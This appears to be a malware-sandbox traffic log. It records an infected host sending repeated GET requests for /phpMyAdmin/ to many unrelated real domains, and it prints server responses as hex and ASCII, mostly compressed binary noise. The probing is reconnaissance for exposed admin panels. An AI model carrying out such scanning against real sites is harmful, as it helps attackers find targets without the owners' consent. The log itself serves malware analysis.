2d e3 32 61 91 31 c6 14 27 28 34 04 8b 89 cb e1 cb 88 18 2c 04 26 b3 00 09 49 69 cc 58 1a 7a 06 9e c7 d8 15 72 81 4f 60 e7 00 27 b8 b9 25 61 80 b8 41 84 14 a3 65 7c 84 57 16 63 c5 42 91 ac 19 22 d8 80 63 94 b8 41 26 cb 03 b0 53 Data Ascii: 2B7Yn8OzE;lG$M3M^v$b-z${HJ$n2%\s!so'":50m2Lbr6%n]8?{MYwz(@OfVK'xyO_~xz79yHvl~3mu[<ptgggg77t$N7xs<,7C"S\|v/l4_n:F:FdJ8F\|sxr*))KZ7ux<4m@1'(Jw4q17+$i[o(Y0\F x"yxJ\l&DGDiTI9N+r`j0wK1;DN.@+'J1T04ootTlM-2a1'(4,&IiXzrO`'%aAe\|WcB"cA&S
Feb 21, 2024 00:26:11.484144926 CET	1286	IN	Data Raw: 48 e8 e4 5f 46 f6 93 e0 70 d4 20 60 a2 c6 7a 48 2c 62 30 21 89 d0 18 b7 63 3a de 4c 04 09 f6 47 8d 76 9b 44 e3 16 c7 1e 8b 51 22 75 6c b9 2c 6a 0b 1c c5 21 12 98 b7 43 36 66 bc 2d e7 bf c9 c7 96 62 d1 7e 72 ca c5 02 c0 b0 66 d6 fe f5 81 41 a5 dd Data Ascii: H_Fp `zH,b0!c:LGvDQ"ul,j!C6f-b~rfAB\7B4qjY_[@91AM(vYxLk[f8va%eM2BPZD7M>c'MeEWG8`a$:K`]3~1k>
Feb 21, 2024 00:26:11.484277964 CET	1286	IN	Data Raw: a4 af 5b 73 2f 05 40 f9 29 72 17 6f 19 1c 29 16 fb 75 28 2d bd bb 1a f5 64 f7 35 33 9b 10 6c 46 d0 26 a1 31 5e ae 0f 27 3e 99 63 6f 98 e5 2c e8 ae 36 2d 57 b1 e4 f5 7c f9 a9 86 6d 16 97 a6 3c a8 a8 b0 cd 07 32 76 d5 5c 5e 96 a1 1e fb be ef df 99 Data Ascii: [s/@)ro)u(-d53lF&1^'>co,6-W\|m<2v\^64E.T>lY)\cwU=e7-`Dehkjkydudf]c2$d]jp,y4[Lyeafn.l)PJN4(
Feb 21, 2024 00:26:11.484482050 CET	1286	IN	Data Raw: 8d b4 5c 1b a4 18 72 74 bd 7f 6f 01 a4 ef 2e f9 75 5b 4d 94 b0 02 e0 ed 3a 49 d0 1c 27 50 71 48 ea 33 54 1c 93 45 c4 2a 0a 53 63 f0 4c fe 28 7b c6 18 a8 ca e2 c6 45 19 fe 9a e5 93 5a 74 77 85 27 8d 5d 1c a7 6d f3 3a 7f 4e e2 a8 e8 5b 30 8c 95 6d Data Ascii: \rto.u[M:I'PqH3TE*ScL({EZtw']m:N[0m,tJ!O8#u]("y$QEl982l5',3)ONzx0>Dy@'m;!2J?Qb:c~fHohX7({AN_x+{+GRXrG)
Feb 21, 2024 00:26:11.485088110 CET	1286	IN	Data Raw: 59 ca 70 52 4b a7 26 f3 c2 dc c0 25 12 0e 80 06 65 cf 50 96 f8 13 48 53 13 2f f9 eb a9 0c 06 08 2d 16 cd 58 68 27 1e 0b cb 67 be 9a 4b 8a c5 dc 9a fb ac 95 76 77 9b 07 b6 04 7e ee b3 d5 d2 e7 8c 40 c8 ef b3 dc 8f 76 e0 66 f1 d3 ef 1e 6e 92 e5 28 Data Ascii: YpRK&%ePHS/-Xh'gKvw~@vfn(>Sv-u(%e" ]X=eQZybz,_oW"pRxe(i)G[Lc\CxTurTszQKvbSw{t7cRv,%Cet
Feb 21, 2024 00:26:11.485728025 CET	1286	IN	Data Raw: 55 ca ab 6c 05 7e f8 b0 2d c9 8a 9f c6 24 c9 8a ed b3 78 05 29 ec 44 44 0a 0f 91 80 ec 54 37 fc 1e 96 15 1e 20 0a c1 01 56 22 1a 30 5f 24 18 6b 15 be fd ae cd d9 b3 4a af 46 59 4d 92 85 fb 1a 26 3b b5 23 6e f2 98 43 98 55 7c 8c dd 59 a3 3b 5e 37 Data Ascii: Ul~-$x)DDT7 V"0_$kJFYM&;#nCU\|Y;^7]bT]H/&\3\|"V\|[@%a%s#VuqNX5YZ43K$02YW0Diz]`^VS9^z!0oiH\|X5
Feb 21, 2024 00:26:11.485862970 CET	856	IN	Data Raw: fb 8e 91 5d de 7b d5 7d ee 9b 22 ca c4 93 a7 c6 db 86 14 85 d1 db 23 5f 45 45 b9 25 59 55 54 a7 d3 68 a4 d2 6f d2 5a 6a 8f f9 ab 21 d5 d4 c1 e6 a2 75 62 73 bc e9 38 39 eb ea e0 a3 cd 00 bf 04 72 35 47 6b 89 de ab b8 b9 02 5b aa 21 e9 4d 06 b3 28 Data Ascii: ]{}"#_EE%YUThoZj!ubs89r5Gk[!M(m_ks~42Xe#?#~Lj1pEA\|RsMZI+#6e"nXYOUOwo7aFEIl"]C}s6'\|?8 +]8{

Session ID	Source IP	Source Port	Destination IP	Destination Port
227	192.168.2.6	59431	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.045897007 CET	175	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.148111105 CET	225	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/phpMyAdmin/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:11.352884054 CET	225	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/phpMyAdmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
228	192.168.2.6	59252	62.210.211.126	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.064455986 CET	185	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: voltage-distribution.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.224994898 CET	567	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache/2.4.41 (Ubuntu) Location: https://voltage-distribution.com/phpMyAdmin/ Content-Length: 342 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://voltage-distribution.com/phpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at voltage-distribution.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
229	192.168.2.6	58286	218.213.216.154	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.066389084 CET	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: att.com.hk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.400403023 CET	1286	IN	HTTP/1.0 401 Unauthorized Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache Set-Cookie: phpMyAdmin=06sp12kn3d0la29vv5m1b61aqpt499u4; path=/phpMyAdmin/; HttpOnly Expires: Wed, 21 Feb 2024 07:26:11 +0800 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 Last-Modified: Wed, 21 Feb 2024 07:26:11 +0800 Set-Cookie: pma_lang=en; expires=Thu, 21-Mar-2024 23:26:11 GMT; path=/phpMyAdmin/; httponly Set-Cookie: pma_collation_connection=utf8_unicode_ci; expires=Thu, 21-Mar-2024 23:26:11 GMT; path=/phpMyAdmin/; httponly Set-Cookie: phpMyAdmin=44d6bukaakr5mog5t6s3ol1gn73uo8g8; path=/phpMyAdmin/; HttpOnly X-ob_mode: 1 WWW-Authenticate: Basic realm="phpMyAdmin localhost" status: 401 Unauthorized X-Frame-Options: DENY Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;;style-src 'self' 'unsafe-inline' ;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org .tile.opencyclemap.org; X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org .tile.opencyclemap.org; X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' ' Data Raw: Data Ascii:
Feb 21, 2024 00:26:11.400481939 CET	1286	IN	Data Raw: 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 3b 69 6d 67 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 20 2a 2e 74 69 6c 65 2e 6f 70 65 6e 73 74 72 65 65 74 6d 61 70 2e 6f 72 67 20 2a 2e 74 69 6c 65 2e 6f 70 65 6e 63 79 63 6c 65 6d 61 70 2e Data Ascii: nsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org .tile.opencyclemap.org;Pragma: no-cacheContent-Encoding: gzipVary: Accept-EncodingContent-Length: 1521Connection: closeContent-Type: text/html; charset=utf-8
Feb 21, 2024 00:26:11.400576115 CET	471	IN	Data Raw: ff 62 82 c7 dc e2 ea 0f 86 43 74 10 6a 3e 87 38 e4 d2 f9 b0 c2 a6 a1 4b b0 6a 66 f4 eb de c9 a3 e9 ab e9 47 af ca b2 97 4b b1 80 5b 7f 97 de a3 50 68 b7 bf 57 81 7e b8 3e a3 dd c1 72 e8 5a 13 d5 6d 4b 29 54 f3 db 50 40 35 ee 7e e1 53 bb b7 e8 9d Data Ascii: bCtj>8KjfGK[PhW~>rZmK)TP@5~S6iQ7-QmiQ5Cv+IQ;5)zK@}x5iS^W4u{X/uWc]XFL\|G=<E:F+OR"wV~Jy;Cb4X7+Lj,Mq5no

Session ID	Source IP	Source Port	Destination IP	Destination Port
230	192.168.2.6	59257	162.241.216.197	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.076598883 CET	186	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: wilsonfamilyinsurance.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.161853075 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:12 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 7939 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://wilsonfamilyinsurance.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 Set-Cookie: PHPSESSID=a67064cc4d9d44e1b7df5681b51c8062; path=/ Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 72 6b 73 db b6 d6 f5 e7 78 a6 ff 01 66 a6 b1 d4 0a a4 6e be c9 a6 fb e4 a4 c9 79 72 a6 a7 e9 d3 a4 d3 f7 4c 92 c9 40 e4 26 09 1b 04 58 00 d4 a5 ae ff fb bb 41 5d 2c cb 94 ec c4 4e 8f e2 48 24 b0 f7 5a 6b af bd be d9 f9 66 e7 74 f7 c7 37 2f de fd e7 97 97 24 b3 b9 38 c3 03 f7 4b 04 93 69 e8 81 a4 bf bd f5 aa 43 60 b1 fb cd c1 32 12 65 4c 1b b0 a1 f7 db bb 57 f4 c8 23 c1 f2 26 b3 b6 a0 f0 47 c9 47 a1 f7 ff e8 6f cf e9 0b 95 17 cc f2 a1 00 8f 44 4a 5a 90 d8 f6 fa 65 08 71 0a de b2 4d b2 1c 42 6f c4 61 5c 28 6d 57 2a c7 3c b6 59 18 c3 88 47 40 ab 97 16 e1 92 5b ce 04 35 11 13 10 76 bc 33 f2 0d ce 41 c8 a9 e5 56 c0 d9 2f 2c 05 22 95 25 89 2a 65 4c 9e 3d 3d ea 76 3a 27 e4 77 2e 8c 92 e4 15 cb b9 98 92 d7 d2 94 9a c9 08 4e 83 59 d7 aa 90 3d ad 86 ca 9a bd a5 8c bd 9c 4d 28 cf 11 98 16 1a 9c cc 81 60 3a 85 3d 9c 7c e7 54 70 79 41 34 88 70 2f 96 c6 15 24 60 a3 6c 8f 64 f8 14 ee 05 81 b1 cc 1a 7f 5c f8 91 ca ef d7 91 20 af f1 53 a5 52 01 ac e0 e6 fe 9d a3 b6 3f 56 3a c6 0b f3 19 5d bc 5d 2f cf 63 c2 82 96 cc e2 f2 ec b4 c0 15 b1 a2 10 3c c2 85 2a 19 68 63 be 9f e4 02 af 9c 83 a1 b7 c1 61 f2 4c b3 3f 4a 75 42 5e 01 c4 de 8c d3 73 39 31 83 20 18 57 3d 49 d5 c2 17 1d 4e 49 90 60 75 e0 7d 4d 3d 18 cd 1c b7 6b 3e 53 58 34 6f 5b 51 f8 e4 c9 e9 2e a5 e4 5d c6 0d 31 dc 02 29 0d 18 62 33 20 ff ac 76 48 9e 4b 26 a6 96 47 86 0c a7 e4 df 4a 1a 1c 03 05 f1 34 43 fa 42 94 29 97 64 74 e4 77 fb 7e 9b 50 f2 9b e1 32 5d e9 b1 9a 45 17 ee 88 92 a5 bc f1 d8 cf 67 38 7c 8e 53 89 23 94 2e e5 fc ac 2c 0c 6e b1 a1 44 a9 2c 89 4a ad 71 0a 34 06 43 9e f0 b4 d4 10 13 74 cb 2e 66 f0 71 1c 98 4d a3 c6 12 34 91 38 2e 6a 51 84 95 38 99 b4 ce 76 20 63 6e b3 db 53 72 59 4d bf ce 6d c0 5a 9c 03 47 66 12 84 3f 17 fb 64 a9 f7 7a d2 48 c5 e0 ca 97 25 55 45 70 2f 3f e7 16 98 48 f3 c2 ce 73 62 61 62 83 73 36 62 b3 53 ef 6c 27 f8 8e 9c ee be 7f f1 e3 f3 77 cf df 93 ef 82 9d 31 97 b1 1a fb 9f c6 05 e4 ea 9c bf 5d 48 0d c9 a5 37 64 06 7e d3 c2 1b cc e3 f1 21 f8 10 18 7f ec 2b 9d 7e 08 78 ce 52 30 1f 30 17 1a 3e 04 55 f3 87 a0 83 9b f4 db 1f 82 c3 ee e4 b0 fb 21 f0 5a 1e 0a c0 7e bf 90 29 be 98 51 fa 65 78 d8 58 a1 e1 ef cb 19 20 3e b9 77 55 ea 08 bc c1 a5 87 eb 74 8b 71 6d 73 fc 0a 7e 63 9e f1 aa a0 5c 46 a2 8c 1d eb b9 a9 0e aa 7e aa 41 00 8e ee e7 5c fa e7 e6 87 11 e8 f0 c0 ef fb Data Ascii: rksxfnyrL@&XA],NH$Zkft7/$8KiC`2eLW#&GGoDJZeqMBoa\(mW<YG@[5v3AV/,"%eL==v:'w.NY=M(`:=\|TpyA4p/$`ld\ SR?V:]]/c<*hcaL?JuB^s91 W=INI`u}M=k>SX4o[Q.]1)b3 vHK&GJ4CB)dtw~P2]Eg8\|S#.,nD,Jq4Ct.fqM48.jQ8v cnSrYMmZGf?dzH%UEp/?Hsbabs6bSl'w1]H7d~!+~xR00>U!Z~)QexX >wUtqms~c\F~A\
Feb 21, 2024 00:26:12.161926031 CET	1286	IN	Data Raw: 3d ef ea ea 04 0d dc 9d 25 3e e1 b8 11 fc c5 5c 28 9a 02 66 05 f9 63 e7 e9 6e 52 ca c8 72 25 1b bc 25 9b 97 23 a6 89 6a 99 16 9c 2c ce 49 d4 80 e6 a5 d5 d3 ea ce 86 97 a6 2c 0a a5 ed 3b 30 d6 0c a0 65 79 8e 4f 2c 2f 06 0d 09 63 f2 23 02 37 fd 11 Data Ascii: =%>\(fcnRr%%#j,I,;0eyO,/c#7%I [4c`^7?j\!Ol^+QE94GBdVLbZ1mvXpjXnp*f)jrE>~$+MR<`K-C0m,5/~o?^5
Feb 21, 2024 00:26:12.162091970 CET	1286	IN	Data Raw: 4e 8d 9d 0a 20 3c 0e f7 c6 05 ad 3a 68 75 64 28 97 82 4b a0 91 31 7b c4 4e 0b 08 f7 2c 4c 6c e0 de cf 76 76 9e f0 3c 45 31 d4 e4 5c c0 b4 45 dc 6b d5 4e 2e 77 9e 3c 89 b9 29 04 9b 0e c8 0c 84 ec f2 dc 79 c6 a4 3d c1 db a1 d2 31 e8 01 91 aa e6 6a Data Ascii: N <:hud(K1{N,Llvv<E1\EkN.w<)y=1jBMpx@v3.rS.M~5OnVkU,cqDA{3{3}(TtAj33IY[`Q2aKSj&#<f.#Q`f47fK~yn-s
Feb 21, 2024 00:26:12.162180901 CET	1286	IN	Data Raw: 9d a1 9d b1 0d 95 8e 81 95 93 3b 98 70 04 1c ab 73 b0 7f 1d 0a 3c eb ef e3 5f 93 ec 2f c8 d1 a5 76 eb a0 7b ef 8c c6 a5 b9 b8 c7 88 bd 56 a7 d3 bd 1e f1 f8 b8 75 84 36 1f 77 af 99 0f f6 5b 47 18 9b f6 d1 5d d4 05 13 40 55 04 4c de cd db af b8 af Data Ascii: ;ps<_/v{Vu6w[G]@ULyVB}pGnNeh;G]/m4a{BhJMNl.!e> *t!l+,[e`)~_CWn)cIgT`En+9;Rr
Feb 21, 2024 00:26:12.162235022 CET	207	IN	Data Raw: eb b2 c3 74 0a 5f 00 58 f5 d5 e0 4d be 18 71 52 87 b9 e3 63 f5 50 a8 e8 82 4a 36 e2 29 b3 5c 49 c2 06 e3 0c 34 34 06 52 d9 86 ab c0 45 e7 d5 f6 4a 6b 95 6c 36 2f 23 25 94 1e 10 2e b1 8e 3b 9c 79 c7 35 5c a1 8c a5 16 f2 42 30 0b 3e 77 4e 4c 55 69 Data Ascii: t_XMqRcPJ6)\I44REJkl6/#%.;y5\B0>wNLUii"`LY1 {S(nYaZV\|*J!(\|wj@3pauGw;psD=pOC5s.id4$^fm11F\L
Feb 21, 2024 00:26:12.169075966 CET	1286	IN	Data Raw: b9 34 a5 c6 72 f0 23 95 07 28 2d 42 29 b8 a0 a0 10 65 8a 97 01 4f 34 cb 01 8d 2c ca 22 e0 32 0a 6a 38 7c e4 f8 61 04 3a 3c f0 fb 7e 6f 8f d8 69 01 e1 9e 85 89 0d 2a 76 97 69 16 ee 31 21 f6 48 b0 75 80 a1 52 d6 58 cd 8a 2f 95 6d 33 cc 97 09 12 2e Data Ascii: 4r#(-B)eO4,"2j8\|a:<~oivi1!HuRX/m3.U&8:j.a#]>Z54bZ#Eh:+!a_AzuYS(iY5)h%`iU+!1.cs# AuEsJXMQtoe\|{o/(x]
Feb 21, 2024 00:26:12.169195890 CET	1286	IN	Data Raw: b7 ed d7 b6 81 d6 6a 39 ca d3 f8 a0 77 d0 3b 5c ad 1a 96 d6 62 26 b6 3b b8 28 ba 6d 61 fb e0 80 b1 61 4d ed aa 1d 1b 8d 36 fc 4f a0 5c 16 a5 a5 19 f0 34 b3 03 d2 af 5d de 4a a1 29 58 c4 65 3a 20 9d fd 8d 95 09 c6 b3 7a c2 aa 83 8d 55 82 4b 58 f2 Data Ascii: j9w;\b&;(maaM6O\4]J)Xe: zUKXv7,fXXe]n&lG&wRuU7ksKe:kV,g:HU`]<>8;2`ft)3&@kw7;RJCL*++LCzlv
Feb 21, 2024 00:26:12.169312954 CET	534	IN	Data Raw: 71 f4 3f 2b 4b 5e a9 52 c6 4e 64 6f bd 8a dd db e4 e5 82 86 56 12 fc 4f 13 2e d5 ba 1e f7 f9 07 8b 2e 88 55 e4 7f 55 0e b7 7c e5 0b 94 84 91 84 51 a1 64 4a 99 d6 6a 4c 35 4f 33 8b d9 08 f8 2d df d9 46 d7 e7 36 e2 fb 4a 85 89 34 2f 2c 71 19 0d 3d Data Ascii: q?+K^RNdoVO..UU\|QdJjL5O3-F6J4/,q=zh6iuA!/s4+Y9OXVcn~4L0tucz9:CoYd*Ish6'`6P)kf}7Ce_I(cTN

Session ID	Source IP	Source Port	Destination IP	Destination Port
231	192.168.2.6	59289	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.080236912 CET	174	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.253856897 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
232	192.168.2.6	59419	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.113657951 CET	174	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.273022890 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
233	192.168.2.6	59359	109.71.40.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.120117903 CET	174	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.302094936 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:11 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 39 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 Data Ascii: 598<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; 